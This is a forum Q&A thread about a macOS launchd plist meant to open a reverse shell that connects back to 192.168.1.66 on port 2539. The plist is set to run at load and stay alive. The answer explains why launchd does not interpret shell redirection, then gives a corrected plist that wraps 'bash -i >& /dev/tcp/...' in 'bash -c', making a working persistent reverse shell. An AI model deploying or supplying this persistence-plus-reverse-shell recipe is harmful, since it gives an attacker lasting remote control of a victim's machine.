Launchd File for reverse stream

0

Does anyone have any ideas why this fails to execute a reverse stream connection when loaded?

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
        <key>Label</key>
        <string>com.unix.bash.plist</string>
        <key>ProgramArguments</key>
        <array>
                <string>/bin/bash</string>
                <string>-i</string>
                <string>&gt;&amp; /dev/tcp/192.168.1.66/2539 0&gt;&amp; 1</string>
        </array>
        <key>RunAtLoad</key>
        <true/>
        <key>StartInterval</key>
        <integer>100</integer>
        <key>KeepAlive</key>
        <true/>
</dict>
</plist>

November

Posted 2012-12-09T21:09:23.343

Reputation: 153

Answers

1

Redirections such as < or > (and in most Unixes, even the /dev/tcp special files) are part of the shell's command syntax, and can be used only inside a shell that supports them. However, launchd does not use any shell to start services – it creates the process directly using execve() or similar functions, passing a list of arguments that are not interpreted further.

In this case, /bin/bash is executed, and receives the following arguments:

  • argv[0] = "/bin/bash"
  • argv[1] = "-i"
  • argv[2] = ">& /dev/tcp/192.168.1.66/2539 0>& 1"
  • argv[3] = NULL

Bash interprets the second argument (argv[2]) as a file name of a shell script to run; since such a file doesn't exist, bash exits.

Now, if you need the command to be interpreted by a shell, you will have to run a shell manually:

    <key>ProgramArguments</key>
    <array>
            <string>/bin/bash</string>
            <string>-c</string>
            <string>bash -i &gt;&amp; /dev/tcp/192.168.1.66/2539 0&gt;&amp; 1</string>
    </array>

user1686

Posted 2012-12-09T21:09:23.343

Reputation: 283 655

so are you saying this cant work, or giving me a solution? – November – 2012-12-09T21:58:27.500

Thank you for answering my question. I know its not on topic but should this file now connect a shell back to 192.168.1.66 on 2539? – November – 2012-12-10T03:06:39.113

Asked: 2012-12-09T21:09:23.343

Viewed: 95 times

Active: 2012-12-09T23:21:11.760